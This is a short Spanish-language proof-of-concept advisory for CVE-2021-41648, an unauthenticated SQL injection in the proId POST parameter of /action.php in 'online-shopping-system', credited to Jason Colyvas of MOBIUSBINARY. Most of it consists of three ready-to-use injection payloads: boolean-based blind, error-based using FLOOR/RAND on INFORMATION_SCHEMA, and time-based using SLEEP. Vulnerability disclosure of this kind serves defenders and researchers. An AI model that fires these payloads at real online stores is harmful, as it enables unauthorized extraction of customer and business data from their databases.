
Explotación de prueba de concepto para inyección SQL no autenticada en online-shopping-system a través del parámetro proId, permitiendo la extracción de datos de la base de datos MySQL.
CVE-2021-41648 Inyección SQL en online-shopping-system
El sistema online-shopping-system es vulnerable a ataques de inyección SQL no autenticados, ciegos basados en errores/booleanos y basados en errores.
El parámetro proId en la página /action.php no sanitiza la entrada del usuario, un atacante puede extraer datos sensibles de la base de datos MySQL subyacente.
URL: /action.php
PARÁMETRO: proId
Parameter: proId (POST)
Type: ciego basado en booleanos
Title: OR ciego basado en booleanos - cláusula WHERE o HAVING (NOT - comentario MySQL)
Payload: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1
Type: basado en errores
Title: MySQL >= 5.0 OR basado en errores - cláusula WHERE, HAVING, ORDER BY o GROUP BY (FLOOR)
Payload: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1
Type: ciego basado en tiempo
Title: MySQL >= 5.0.12 AND ciego basado en tiempo (consulta SLEEP)
Payload: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Jason Colyvas
MOBIUSBINARY
21 de septiembre de 2021